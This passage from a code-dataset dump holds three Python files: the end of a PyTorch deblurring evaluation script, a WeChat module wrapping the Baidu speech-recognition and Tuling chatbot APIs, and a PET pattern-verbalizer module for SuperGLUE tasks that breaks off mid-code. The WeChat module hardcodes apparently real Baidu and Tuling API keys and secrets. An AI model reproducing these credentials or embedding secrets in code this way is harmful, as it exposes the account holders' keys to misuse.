data_range=imgFullResY.max()-imgFullResY.min()) \n #list_SSIM_LR_fullRes += [tmp]\n \n\n clearImageY = rgb2ycbcr(((clearImage+1)/2*255).astype(np.int))\n clearImageY = clearImageY[:,:,0]\n blurImageY = rgb2ycbcr(((blurImage+1)/2*255).astype(np.int))\n blurImageY = blurImageY[:,:,0]\n reconImageY = rgb2ycbcr(((reconstructedHR+1)/2*255).astype(np.int)) \n reconImageY = reconImageY[:,:,0]\n\n tmp = psnr(reconImageY, clearImageY, 255) \n list_PSNR += [tmp] \n tmp = 
ssim(reconImageY, clearImageY, data_range=clearImageY.max()-clearImageY.min()) \n list_SSIM += [tmp]\n tmp = psnr(blurImageY, clearImageY, 255) \n list_PSNR_LR += [tmp]\n tmp = ssim(blurImageY, clearImageY, data_range=clearImageY.max()-clearImageY.min()) \n list_SSIM_LR += [tmp]\n \n if sampleId%10==0: \n print('{:05d} PSNR:{:.3f}, SSIM:{:.3f} -- blur PSNR:{:.3f}, SSIM:{:.3f}'.format(\n sampleId, list_PSNR[-1], list_SSIM[-1], list_PSNR_LR[-1], list_SSIM_LR[-1], ))\n #print('\\tfullRes PSNR:{:.3f}, SSIM:{:.3f} -- blur PSNR:{:.3f}, SSIM:{:.3f}'.format(\n # list_PSNR_fullRes[-1], list_SSIM_fullRes[-1], list_PSNR_LR_fullRes[-1], list_SSIM_LR_fullRes[-1], ))\n if sampleId>=id_of_interest>=0: break\n\n\n# In[ ]:\n\n\nobjDemoShowFlow = DemoShowFlow()\n\nfigWinNumHeight, figWinNumWidth = 2, 2\nplt.figure(figsize=(11,11), dpi=96, facecolor='w', edgecolor='k') # figsize -- inch-by-inch\nplt.clf()\nsubwinCount = 1 \nplt.subplot(figWinNumHeight,figWinNumWidth,subwinCount)\nsubwinCount += 1 \nplt.imshow((blurImage.clip(-1,1)+1)/2)\nplt.axis('off')\nplt.title('blurry image')\n\n\nplt.subplot(figWinNumHeight,figWinNumWidth,subwinCount)\nsubwinCount += 1 \nplt.imshow((reconstructedHR.clip(-1,1)+1)/2)\nplt.axis('off')\nplt.title('deblurred image')\n\n\nplt.subplot(figWinNumHeight,figWinNumWidth,subwinCount)\nsubwinCount += 1\nflowVisShow=torch.from_numpy(filterFlowMap)\nUV = objDemoShowFlow.filterFlow2UV(flowVisShow).detach().numpy()\nUV = UV/np.ceil(kernel_size/2)\n#UV = UV/UV.max()\nflowVisShow = objDemoShowFlow.computeColor(UV[0], UV[1])/255. \nplt.imshow(flowVisShow) # torch.from_numpy(flowVis)\nplt.axis('off')\nplt.title('filter flow')\n\n#misc.imsave('deblur_filterflow.png', flowVisShow*255, format='png')\n\n","sub_path":"tutorial_pytorch_17_motionblur/main900_save_trainset.py","file_name":"main900_save_trainset.py","file_ext":"py","file_size_in_byte":18095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"208893518","text":"# -*- coding: utf-8 -*-\n\"\"\"\n第三方api接入\n百度语音识别\n七牛云存储\n\"\"\"\nimport requests\nimport base64\nimport json\n\n\n# Baidu 语音识别\n# App ID: 4810653\n# API Key: LjL2tSwrKmnDLLEMPazCkEce\n# Secret Key: E4IPseqzFbD7NeyzvPneXeKEo2dORLeR\nclass BaiDuVoice(object):\n voice_url = 'https://openapi.baidu.com/oauth/2.0/token?grant_type=%s&client_id=%s&client_secret=%s'\n grant_type = 'client_credentials'\n client_id = 'LjL2tSwrKmnDLLEMPazCkEce'\n client_secret = 'E4IPseqzFbD7NeyzvPneXeKEo2dORLeR'\n\n def __init__(self):\n pass\n\n def get_access_token(self):\n \"\"\"\n @return:\n {\n \"access_token\": \"1.a6b7dbd428f731035f771b8d********.86400.1292922000-2346678-124328\",\n \"expires_in\": 86400,\n \"refresh_token\": \"2.385d55f8615fdfd9edb7c4b********.604800.1293440400-2346678-124328\",\n \"scope\": \"public\",\n \"session_key\": \"ANXxSNjwQDugf8615Onqeik********CdlLxn\",\n \"session_secret\": \"248APxvxjCZ0VEC********aK4oZExMB\",\n }\n \"\"\"\n url = self.voice_url % (self.grant_type, self.client_id, self.client_secret)\n res = requests.request('get', url)\n return res.json()\n\n def analysis_voice(self, params={}):\n \"\"\"\n format\tsting\t必填\t语音压缩的格式,请填写上述格式之一,不区分大小写\n rate\tint\t必填\t采样率,支持 8000 或者 16000\n channel\tint\t必填\t声道数,仅支持单声道,请填写 1\n cuid\tstring\t必填\t用户唯一标识,用来区分用户,填写机器 MAC 地址或 IMEI 码,长度为60以内\n token\tstring\t必填\t开放平台获取到的开发者 access_token\n ptc\tint\t选填\t协议号,下行识别结果选择,默认 nbest 结果\n lan\tstring\t选填\t语种选择,中文=zh、粤语=ct、英文=en,不区分大小写,默认中文\n url\tstring\t选填\t语音下载地址\n callback\tstring\t选填\t识别结果回调地址\n speech\tstring\t选填\t真实的语音数据 ,需要进行base64 编码\n len\tint\t选填\t原始语音长度,单位字节\n 其中,开发者可以把语音数据放在 JSON 序列的“speech”字段中,需要将语音先进行 base64编码,并标明语音数据的原始长度,\n 填写“len”字段;也可以直接提供语音下载地址放在“url”字段中,并且提供识别结果的回调地址,放在“callback”参数中。\n 因此“speech”和“len”参数绑定,“url”和“callback”参数绑定,这两组参数二选一填写,如果都填,默认处理第一种。\n\n 这里选择base64编码\n @param voice:\n @return:\n \"\"\"\n voice = params['voice']\n speech = base64.b64encode(voice)\n token = self.get_access_token()['access_token']\n\n data = dict()\n data['cuid'] = 'baidu_voice_analysis_voice'\n data['token'] = token\n data['format'] = params['format']\n data['channel'] = 1\n data['rate'] = 8000\n data['len'] = len(voice)\n data['speech'] = speech\n\n url = 'http://vop.baidu.com/server_api'\n res = requests.request('post', url, data=json.dumps(data), headers={'Content-Type': 'application/json'})\n return res\n\n\nbaidu = BaiDuVoice()\n\n\n# 图灵机器人问答\nclass QARobot(object):\n \"\"\"\n 图灵机器人问答 ,回复用户发来的语音或文字\n\n Code\t说明\n 100000\t文本类\n {\n \"code\":100000,\n \"text\":\"你也好 嘻嘻\"\n }\n 200000\t链接类\n {\n \"code\": 200000,\n \"text\": \"亲,已帮你找到图片\",\n \"url\": \"http://m.image.so.com/i?q=%E5%B0%8F%E7%8B%97\"\n }\n\n 302000\t新闻类\n {\n \"code\": 302000,\n \"text\": \"亲,已帮您找到相关新闻\",\n \"list\": [\n {\n \"article\": \"工信部:今年将大幅提网速降手机流量费\",\n \"source\": \"网易新闻\",\n \"icon\": \"\",\n \"detailurl\": \"http://news.163.com/15/0416/03/AN9SORGH0001124J.html\"\n },\n {\n \"article\": \"北京最强沙尘暴午后袭沪 当地叫停广场舞\",\n \"source\": \"网易新闻\",\n \"icon\": \"\",\n \"detailurl\": \"http://news.163.com/15/0416/14/ANB2VKVC00011229.html\"\n },\n {\n \"article\": \"公安部:小客车驾照年内试点自学直考\",\n \"source\": \"网易新闻\",\n \"icon\": \"\",\n \"detailurl\": \"http://news.163.com/15/0416/01/AN9MM7CK00014AED.html\"\n }\n ]\n }\n 308000\t菜谱类\n {\n \"code\": 308000,\n \"text\": \"亲,已帮您找到菜谱信息\",\n \"list\": [\n {\n \"name\": \"鱼香肉丝\",\n \"icon\": \"http://i4.xiachufang.com/image/280/cb1cb7c49ee011e38844b8ca3aeed2d7.jpg\",\n \"info\": \"猪肉、鱼香肉丝调料 | 香菇、木耳、红萝卜、黄酒、玉米淀粉、盐\",\n \"detailurl\": 
\"http://m.xiachufang.com/recipe/264781/\"\n }\n ]\n }\n 313000(儿童版)\t儿歌类\n 314000(儿童版)\t诗词类\n\n 错误吗\n 40001\t参数key错误\n 40002\t请求内容info为空\n 40004\t当天请求次数已使用完\n 40007\t数据格式异常\n \"\"\"\n\n @classmethod\n def get_reply(cls, info, userid):\n\n url = u\"http://www.tuling123.com/openapi/api?key={key}&info={info}&userid={userid}\"\n apikey = '1b674544c532430f9af0bfb80a6230c6'\n params = {\n \"key\": apikey, # 您申请到的本接口专用的APPKEY\n \"info\": info, # 要发送给机器人的内容,不要超过30个字符\n \"userid\": userid, # 1~32位,此userid针对您自己的每一个用户,用于上下文的关联\n\n }\n res = requests.request('get', url.format(**params))\n try:\n data = res.json()\n if data['code'] == 100000:\n reply = data['text']\n elif data['code'] == 200000:\n reply = u\"%s\\n\\n点击查看\\n\" % (data['text'], data['url'])\n elif data['code'] == 302000:\n news = ''\n new_template = u\"{title}\\n\\n\"\n for new in data['list'][:5]:\n news += new_template.format(url=new['detailurl'], title=new['article'])\n reply = u\"%s\\n\\n%s\\n\" % (data['text'], news)\n elif data['code'] == 308000:\n menus = ''\n menu_template = u\"{title}\\n[{info}]\\n\\n\"\n for menu in data['list'][:5]:\n menus += menu_template.format(url=menu['detailurl'], title=menu['name'], info=menu['info'])\n reply = u\"%s\\n\\n%s\\n\" % (data['text'], menus)\n else:\n reply = u'抱歉,我的主人出门了'\n return {'success': True, 'reply': reply}\n except Exception as e:\n return {'success': False, 'msg': e.message}\n","sub_path":"wechat/third_party_api/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":7121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"83675409","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis file contains the pattern-verbalizer pairs (PVPs) for all tasks.\n\"\"\"\nimport copy\nimport random\nimport string\nfrom abc import ABC, abstractmethod\nfrom collections import defaultdict\nfrom typing import Tuple, List, Union, Dict\nimport numpy as np\n\nfrom tasks.data_utils import InputExample, num_special_tokens_to_add, build_input_from_ids, build_sample, \\\n build_decoder_input, build_decoder_sample\nfrom utils import print_rank_0\n\nFilledPattern = Tuple[List[Union[str, Tuple[str, bool]]], List[Union[str, Tuple[str, bool]]]]\n\n\nclass PVP(ABC):\n \"\"\"\n This class contains functions to apply patterns and verbalizers as required by PET. Each task requires its own\n custom implementation of a PVP.\n \"\"\"\n is_multi_token = False\n\n def __init__(self, args, tokenizer, label_list, max_seq_length, pattern_id=0, seed=42, fast_decode=False,\n continuous_prompt=False):\n \"\"\"\n Create a new PVP.\n\n :param args: the args\n :param tokenizer: the tokenizer\n :param label_list: the list of labels\n :param max_seq_length: the maximum length of the sequence\n :param pattern_id: the pattern id to use\n :param seed: a seed to be used for generating random numbers if necessary\n :param is_multi_token: if the verbalizers contain multiple tokens\n :param fast_decode: whether to use the fast decode mode for multi-token tasks\n :param continuous_prompt: whether to use continuous prompt optimization\n \"\"\"\n self.args = args\n self.tokenizer = tokenizer\n self.label_list = label_list\n self.max_seq_length = max_seq_length\n self.pattern_id = pattern_id\n self.rng = random.Random(seed)\n self.num_truncated = 0\n self.fast_decode = fast_decode\n self.max_dec_seq_length = 16\n self.continuous_prompt = continuous_prompt\n\n @property\n def spell_length(self):\n return 0\n\n @property\n def mask(self) -> str:\n \"\"\"Return the underlying LM's mask token\"\"\"\n return self.tokenizer.get_command('MASK').Id\n\n @property\n def mask_id(self) -> int:\n \"\"\"Return the underlying LM's mask id\"\"\"\n return self.tokenizer.get_command('MASK').Id\n\n @property\n def max_num_verbalizers(self) -> int:\n \"\"\"Return the maximum number of verbalizers across all labels\"\"\"\n return max(len(self.verbalize(label)) for label in self.label_list)\n\n @staticmethod\n def shortenable(s):\n \"\"\"Return an instance of this string that is marked as shortenable\"\"\"\n return s, True\n\n @staticmethod\n def remove_final_punc(s: Union[str, Tuple[str, bool]]):\n \"\"\"Remove the final punctuation mark\"\"\"\n if isinstance(s, tuple):\n return PVP.remove_final_punc(s[0]), s[1]\n return s.rstrip(string.punctuation)\n\n @staticmethod\n def lowercase_first(s: Union[str, Tuple[str, bool]]):\n \"\"\"Lowercase the first character\"\"\"\n if isinstance(s, tuple):\n return PVP.lowercase_first(s[0]), s[1]\n return s[0].lower() + s[1:]\n\n @staticmethod\n def uppercase_first(s: Union[str, Tuple[str, bool]]):\n \"\"\"Lowercase the first 
character\"\"\"\n if isinstance(s, tuple):\n return PVP.uppercase_first(s[0]), s[1]\n return s[0].upper() + s[1:]\n\n def encode(self, example: InputExample, priming: bool = False, labeled: bool = False):\n \"\"\"\n Encode an input example using this pattern-verbalizer pair.\n\n :param example: the input example to encode\n :param priming: whether to use this example for priming\n :param labeled: if ``priming=True``, whether the label should be appended to this example\n :return: A tuple, consisting of a list of input ids and a list of token type ids\n \"\"\"\n\n if not priming:\n assert not labeled, \"'labeled' can only be set to true if 'priming' is also set to true\"\n\n tokenizer = self.tokenizer\n raw_parts_a, raw_parts_b = self.get_parts(example)\n\n raw_parts_a = [x if isinstance(x, tuple) else (x, False) for x in raw_parts_a]\n prompt_id = tokenizer.num_tokens\n\n def encode_input(raw_parts):\n parts, flags = [], []\n for x, s in raw_parts:\n if isinstance(x, str):\n x = tokenizer.EncodeAsIds(x)\n flag = [0] * len(x)\n elif isinstance(x, int):\n flag = [1] * x\n x = [prompt_id] * x\n else:\n flag = [0] * len(x)\n parts.append((x, s))\n flags.append((flag, x))\n return parts, flags\n\n parts_a, flags_a = encode_input(raw_parts_a)\n parts_b, flags_b = None, None\n if raw_parts_b:\n raw_parts_b = [x if isinstance(x, tuple) else (x, False) for x in raw_parts_b]\n parts_b, flags_b = encode_input(raw_parts_b)\n\n if self.is_multi_token:\n answers = self.get_answers(example)\n\n if not self.fast_decode:\n ids_list, positions_list, sep_list, mask_list, target_list, prompt_list = [], [], [], [], [], []\n for idx, answer in enumerate(answers):\n this_parts_a, this_parts_b = copy.deepcopy(parts_a), copy.deepcopy(parts_b)\n answer_ids = get_verbalization_ids(answer, tokenizer, force_single_token=False)\n answer_ids = answer_ids + [tokenizer.get_command('eop').Id]\n self.num_truncated += self.truncate(this_parts_a, this_parts_b, answer_ids,\n max_length=self.max_seq_length)\n tokens_a = [token_id for part, _ in this_parts_a for token_id in part]\n tokens_b = [token_id for part, _ in this_parts_b for token_id in part] if parts_b else None\n data = build_input_from_ids(tokens_a, tokens_b, answer_ids, self.max_seq_length, self.tokenizer,\n args=self.args, add_cls=True, add_sep=False, add_piece=True,\n mask_id=self.mask_id)\n ids, types, paddings, position_ids, sep, target_ids, loss_masks = data\n prompt_pos = [idx for idx, token in enumerate(ids) if token == prompt_id]\n ids = [idx if idx != prompt_id else 0 for idx in ids]\n prompt_list.append(prompt_pos)\n ids_list.append(ids)\n positions_list.append(position_ids)\n sep_list.append(sep)\n target_list.append(target_ids)\n mask_list.append(loss_masks)\n if example.label is not None:\n label = self.label_list.index(example.label)\n else:\n label = 0\n sample = build_sample(ids_list, positions=positions_list, masks=sep_list, label=label,\n logit_mask=mask_list, target=target_list, unique_id=example.guid,\n prompt_ids=prompt_list)\n return sample\n\n else:\n this_parts_a, this_parts_b = copy.deepcopy(parts_a), copy.deepcopy(parts_b)\n self.num_truncated += self.truncate(this_parts_a, this_parts_b, None, max_length=self.max_seq_length)\n tokens_a = [token_id for part, _ in this_parts_a for token_id in part]\n tokens_b = [token_id for part, _ in this_parts_b for token_id in part] if parts_b else None\n data = build_input_from_ids(tokens_a, tokens_b, None, self.max_seq_length, self.tokenizer,\n args=self.args, add_cls=True, add_sep=False, 
add_piece=False)\n ids, types, paddings, position_ids, sep, target_ids, loss_masks = data\n if example.label is not None:\n label = self.label_list.index(example.label)\n else:\n label = 0\n sample = build_sample(ids, positions=position_ids, masks=sep, label=label, unique_id=example.guid)\n\n ids_list, positions_list, mask_list, target_list, logit_mask_list = [], [], [], [], []\n for answer in answers:\n answer_ids = get_verbalization_ids(answer, tokenizer, force_single_token=False)\n answer_ids = answer_ids + [tokenizer.get_command('eop').Id]\n answer_ids = answer_ids[:self.max_dec_seq_length]\n data = build_decoder_input(ids, answer_ids, self.max_seq_length, self.max_dec_seq_length, tokenizer)\n dec_ids, _, _, dec_position_ids, _, dec_target_ids, dec_loss_masks = data\n ids_list.append(dec_ids)\n positions_list.append(dec_position_ids)\n mask_list.append(sep)\n target_list.append(dec_target_ids)\n logit_mask_list.append(dec_loss_masks)\n\n sample = build_decoder_sample(sample, ids_list, positions_list, mask_list, target_list, logit_mask_list)\n return sample\n\n else:\n self.num_truncated += self.truncate(parts_a, parts_b, [], max_length=self.max_seq_length)\n\n tokens_a = [token_id for part, _ in parts_a for token_id in part]\n tokens_b = [token_id for part, _ in parts_b for token_id in part] if parts_b else None\n if priming:\n input_ids = tokens_a\n if tokens_b:\n input_ids += tokens_b\n if labeled:\n mask_idx = input_ids.index(self.mask_id)\n assert mask_idx == 1, 'sequence of input_ids must contain a mask token'\n assert len(self.verbalize(example.label)) == 1, 'priming only supports one verbalization per label'\n verbalizer = self.verbalize(example.label)[0]\n verbalizer_id = get_verbalization_ids(verbalizer, self.tokenizer, force_single_token=True)\n input_ids[mask_idx] = verbalizer_id\n return input_ids\n data = build_input_from_ids(tokens_a, tokens_b, None, self.max_seq_length, self.tokenizer, args=self.args,\n add_cls=True, add_sep=False, add_piece=True)\n ids, types, paddings, position_ids, sep, target_ids, loss_masks = data\n prompt_pos = [idx for idx, token in enumerate(ids) if token == prompt_id]\n ids = [token if token != prompt_id else 0 for token in ids]\n target_ids = self.get_verbalizer_ids()\n if example.label is not None:\n label = self.label_list.index(example.label)\n else:\n label = 0\n sample = build_sample(ids=ids, positions=position_ids, target=target_ids, masks=sep, logit_mask=loss_masks,\n label=label, unique_id=example.guid, prompt_ids=prompt_pos)\n return sample\n\n @staticmethod\n def _seq_length(parts: List[Tuple[List[int], bool]], only_shortenable: bool = False):\n return sum([len(x) for x, shortenable in parts if not only_shortenable or shortenable]) if parts else 0\n\n @staticmethod\n def _remove_last(parts: List[Tuple[List[int], bool]]):\n last_idx = max(idx for idx, (seq, shortenable) in enumerate(parts) if shortenable and seq)\n parts[last_idx] = (parts[last_idx][0][:-1], parts[last_idx][1])\n\n def truncate(self, parts_a: List[Tuple[List[int], bool]], parts_b: List[Tuple[List[int], bool]], answer: List[int],\n max_length: int):\n \"\"\"Truncate two sequences of text to a predefined total maximum length\"\"\"\n total_len = self._seq_length(parts_a) + self._seq_length(parts_b)\n if answer:\n total_len += len(answer)\n total_len += num_special_tokens_to_add(parts_a, parts_b, answer, add_cls=True, add_sep=False, add_piece=True)\n num_tokens_to_remove = total_len - max_length\n\n if num_tokens_to_remove <= 0:\n return False\n\n for _ in 
range(num_tokens_to_remove):\n if self._seq_length(parts_a, only_shortenable=True) > self._seq_length(parts_b, only_shortenable=True):\n self._remove_last(parts_a)\n else:\n self._remove_last(parts_b)\n return True\n\n @abstractmethod\n def get_parts(self, example: InputExample) -> FilledPattern:\n \"\"\"\n Given an input example, apply a pattern to obtain two text sequences (text_a and text_b) containing exactly one\n mask token (or one consecutive sequence of mask tokens for PET with multiple masks). If a task requires only a\n single sequence of text, the second sequence should be an empty list.\n\n :param example: the input example to process\n :return: Two sequences of text. All text segments can optionally be marked as being shortenable.\n \"\"\"\n pass\n\n def get_answers(self, example: InputExample):\n return [self.verbalize(label)[0] for label in self.label_list]\n\n def get_verbalizer_ids(self):\n target_ids = []\n for label in self.label_list:\n verbalizer = self.verbalize(label)[0]\n verbalizer_id = get_verbalization_ids(verbalizer, self.tokenizer, force_single_token=True)\n target_ids.append(verbalizer_id)\n return target_ids\n\n @abstractmethod\n def verbalize(self, label) -> List[str]:\n \"\"\"\n Return all verbalizations for a given label.\n\n :param label: the label\n :return: the list of verbalizations\n \"\"\"\n pass\n\n def get_mask_positions(self, input_ids: List[int]) -> List[int]:\n label_idx = input_ids.index(self.mask_id)\n labels = [-1] * len(input_ids)\n labels[label_idx] = 1\n return labels\n\n @staticmethod\n def _load_verbalizer_from_file(path: str, pattern_id: int):\n\n verbalizers = defaultdict(dict) # type: Dict[int, Dict[str, List[str]]]\n current_pattern_id = None\n\n with open(path, 'r') as fh:\n for line in fh.read().splitlines():\n if line.isdigit():\n current_pattern_id = int(line)\n elif line:\n label, *realizations = line.split()\n verbalizers[current_pattern_id][label] = realizations\n\n print_rank_0(\"Automatically loaded the following verbalizer: \\n {}\".format(verbalizers[pattern_id]))\n\n def verbalize(label) -> List[str]:\n return verbalizers[pattern_id][label]\n\n return verbalize\n\n\nclass CopaPVP(PVP):\n is_multi_token = True\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_answers(self, example: InputExample):\n choice1 = \" \" + self.remove_final_punc(self.lowercase_first(example.meta['choice1']))\n choice2 = \" \" + self.remove_final_punc(self.lowercase_first(example.meta['choice2']))\n return [choice1, choice2]\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n assert self.pattern_id in [0, 1, 2, 3]\n premise = self.remove_final_punc(self.shortenable(\" \" + example.text_a))\n choice1 = self.remove_final_punc(self.lowercase_first(example.meta['choice1']))\n choice2 = self.remove_final_punc(self.lowercase_first(example.meta['choice2']))\n\n question = example.meta['question']\n assert question in ['cause', 'effect']\n if question == 'cause':\n joiner = ' because'\n else:\n joiner = ', so'\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [1, '\"', choice1, '\" or \"', choice2, '\"', premise, joiner, [self.mask], '.'], []\n elif self.pattern_id == 2:\n return [1, '\"', choice1, '\" or \"', choice2, '\"', 1, premise, joiner, [self.mask], '.'], []\n if self.pattern_id == 0:\n return ['\"', choice1, '\" or \"', choice2, '\"?', premise, joiner, [self.mask], '.'], []\n elif self.pattern_id == 1:\n return [choice1, ' or', \" \" + choice2, '?', premise, joiner, [self.mask], '.'], 
[]\n\n def verbalize(self, label) -> List[str]:\n return []\n\n\nclass WscPVP(PVP):\n is_multi_token = True\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_answers(self, example: InputExample):\n target = \" \" + example.meta['span1_text']\n answers = [target]\n if 'candidates' in example.meta:\n candidates = example.meta['candidates']\n # if len(candidates) > 10:\n # random.shuffle(candidates)\n # candidates = candidates[:10]\n answers += [\" \" + cand for cand in candidates]\n return answers\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n pronoun = example.meta['span2_text']\n pronoun_idx = example.meta['span2_index']\n\n words_a = example.text_a.split()\n words_a[pronoun_idx] = '*' + words_a[pronoun_idx] + '*'\n text_a = ' '.join(words_a)\n text_a = self.shortenable(text_a)\n\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [1, text_a, \" The pronoun '*\" + pronoun + \"*' refers to\", [self.mask], '.'], []\n elif self.pattern_id == 2:\n return [1, text_a, 1, \" pronoun '*\" + pronoun + \"*' refers to\", [self.mask], '.'], []\n elif self.pattern_id == 3:\n return [1, text_a, 1, \" pronoun '*\" + pronoun + \"*'\", 1, \" to\", [self.mask], '.'], []\n elif self.pattern_id == 9:\n return [3, text_a, 3, \" pronoun '*\" + pronoun + \"*'\", 3, \" to\", [self.mask], '.'], []\n else:\n raise NotImplementedError(self.pattern_id)\n if self.pattern_id == 0:\n return [text_a, \" The pronoun '*\" + pronoun + \"*' refers to\", [self.mask], '.'], []\n elif self.pattern_id == 1:\n return [text_a, \" In the previous sentence, the pronoun '*\" + pronoun + \"*' refers to\", [self.mask],\n '.'], []\n elif self.pattern_id == 2:\n return [text_a,\n \" Question: In the passage above, what does the pronoun '*\" + pronoun + \"*' refer to? 
Answer:\",\n [self.mask], '.'], []\n\n def encode(self, example: InputExample, priming: bool = False, labeled: bool = False):\n \"\"\"\n Encode an input example using this pattern-verbalizer pair.\n\n :param example: the input example to encode\n :param priming: whether to use this example for priming\n :param labeled: if ``priming=True``, whether the label should be appended to this example\n :return: A tuple, consisting of a list of input ids and a list of token type ids\n \"\"\"\n if self.args.wsc_negative:\n sample = super().encode(example, priming=priming, labeled=labeled)\n return sample\n\n if not priming:\n assert not labeled, \"'labeled' can only be set to true if 'priming' is also set to true\"\n\n tokenizer = self.tokenizer\n prompt_id = tokenizer.num_tokens\n raw_parts_a, raw_parts_b = self.get_parts(example)\n\n raw_parts_a = [x if isinstance(x, tuple) else (x, False) for x in raw_parts_a]\n\n def encode_input(raw_parts):\n parts, flags = [], []\n for x, s in raw_parts:\n if isinstance(x, str):\n x = tokenizer.EncodeAsIds(x)\n flag = [0] * len(x)\n elif isinstance(x, int):\n flag = [1] * x\n x = [prompt_id] * x\n else:\n flag = [0] * len(x)\n parts.append((x, s))\n flags.append((flag, x))\n return parts, flags\n\n parts_a, flags_a = encode_input(raw_parts_a)\n parts_b, flags_b = None, None\n if raw_parts_b:\n raw_parts_b = [x if isinstance(x, tuple) else (x, False) for x in raw_parts_b]\n parts_b, flags_b = encode_input(raw_parts_b)\n answer = self.get_answers(example)[0]\n answer_ids = get_verbalization_ids(answer, tokenizer, force_single_token=False)\n answer_ids = answer_ids + [tokenizer.get_command('eop').Id]\n self.num_truncated += self.truncate(parts_a, parts_b, answer_ids, max_length=self.max_seq_length)\n tokens_a = [token_id for part, _ in parts_a for token_id in part]\n tokens_b = [token_id for part, _ in parts_b for token_id in part] if parts_b else None\n data = build_input_from_ids(tokens_a, tokens_b, answer_ids, self.max_seq_length, self.tokenizer, args=self.args,\n add_cls=True, add_sep=False, add_piece=True)\n ids, types, paddings, position_ids, sep, target_ids, loss_masks = data\n prompt_pos = [idx for idx, token in enumerate(ids) if token == prompt_id]\n ids = [token if token != prompt_id else 0 for token in ids]\n if example.label is not None:\n label = self.label_list.index(example.label)\n else:\n label = 0\n return {'text': np.array(ids, dtype=np.int64), 'target': np.array(target_ids, dtype=np.int64),\n 'attention_mask': np.array(sep, dtype=np.int64), 'loss_mask': np.array(loss_masks, dtype=np.int64),\n \"position_id\": np.array(position_ids, dtype=np.int64),\n 'prompt_pos': np.array(prompt_pos, dtype=np.int64), 'label': label, 'uid': example.guid}\n\n def verbalize(self, label) -> List[str]:\n return []\n\n\nclass RecordPVP(PVP):\n is_multi_token = True\n\n def get_answers(self, example: InputExample):\n choices = example.meta['candidates']\n choices = [\" \" + choice for choice in choices]\n return choices\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n premise = self.shortenable(example.text_a)\n\n assert '@placeholder' in example.text_b, f'question \"{example.text_b}\" does not contain a @placeholder token'\n question_a, question_b = example.text_b.split('@placeholder')\n return [premise, \" \" + question_a.rstrip(), [self.mask], question_b], []\n\n def verbalize(self, label) -> List[str]:\n return []\n\n\nclass RtePVP(PVP):\n VERBALIZER = {\n \"not_entailment\": [\" No\"],\n \"entailment\": [\" Yes\"]\n }\n\n @property\n def 
spell_length(self):\n return self.pattern_id\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n # switch text_a and text_b to get the correct order\n text_a = example.text_a\n text_b = example.text_b.rstrip(string.punctuation)\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [1, '\"', self.shortenable(text_b), '\" ?'], [[self.mask], ',', ' \"', self.shortenable(text_a),\n '\"']\n elif self.pattern_id == 2:\n return [1, '\"', self.shortenable(text_b), '\" ?'], [[self.mask], ',', 1, ' \"', self.shortenable(text_a),\n '\"']\n elif self.pattern_id == 3:\n return [1, '\"', self.shortenable(text_b), '\" ?'], [1, [self.mask], ',', 1, ' \"',\n self.shortenable(text_a),\n '\"']\n elif self.pattern_id == 9:\n return [3, '\"', self.shortenable(text_b), '\" ?'], [3, [self.mask], ',', 3, ' \"',\n self.shortenable(text_a),\n '\"']\n else:\n raise NotImplementedError(self.pattern_id)\n elif self.pattern_id == 0:\n return ['\"', self.shortenable(text_b), '\" ?'], [[self.mask], ', \"', self.shortenable(text_a), '\"']\n elif self.pattern_id == 1:\n return [self.shortenable(text_b), '?'], [[self.mask], ',', self.shortenable(\" \" + text_a)]\n if self.pattern_id == 2:\n return ['\"', self.shortenable(text_b), '\" ?'], [[self.mask], '. \"', self.shortenable(text_a), '\"']\n elif self.pattern_id == 3:\n return [self.shortenable(text_b), '?'], [[self.mask], '.', self.shortenable(\" \" + text_a)]\n elif self.pattern_id == 4:\n return [self.shortenable(text_a), ' question:', self.shortenable(\" \" + text_b), ' True or False? answer:',\n [self.mask]], []\n\n def verbalize(self, label) -> List[str]:\n if self.pattern_id == 4:\n return [' true'] if label == 'entailment' else [' false']\n return RtePVP.VERBALIZER[label]\n\n\nclass CbPVP(RtePVP):\n VERBALIZER = {\n \"contradiction\": [\" No\"],\n \"entailment\": [\" Yes\"],\n \"neutral\": [\" Maybe\"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n if self.pattern_id == 4:\n text_a = self.shortenable(example.text_a)\n text_b = self.shortenable(\" \" + example.text_b)\n return [text_a, ' question:', text_b, ' true, false or neither? answer:', [self.mask]], []\n return super().get_parts(example)\n\n def verbalize(self, label) -> List[str]:\n if not self.continuous_prompt and self.pattern_id == 4:\n return [' true'] if label == 'entailment' else [' false'] if label == 'contradiction' else [' neither']\n return CbPVP.VERBALIZER[label]\n\n\nclass BoolQPVP(PVP):\n VERBALIZER_A = {\n \"false\": [\" No\"],\n \"true\": [\" Yes\"]\n }\n\n VERBALIZER_B = {\n \"false\": [\" false\"],\n \"true\": [\" true\"]\n }\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n passage = example.text_a\n question = example.text_b\n\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [1, self.shortenable(passage), ' Question:', self.shortenable(\" \" + question), '? Answer:',\n [self.mask], '.'], []\n elif self.pattern_id == 2:\n return [1, self.shortenable(passage), 1, ' Question:', self.shortenable(\" \" + question), '? Answer:',\n [self.mask], '.'], []\n elif self.pattern_id == 3:\n return [1, self.shortenable(passage), 1, ' Question:', self.shortenable(\" \" + question), '? Answer:', 1,\n [self.mask], '.'], []\n elif self.pattern_id 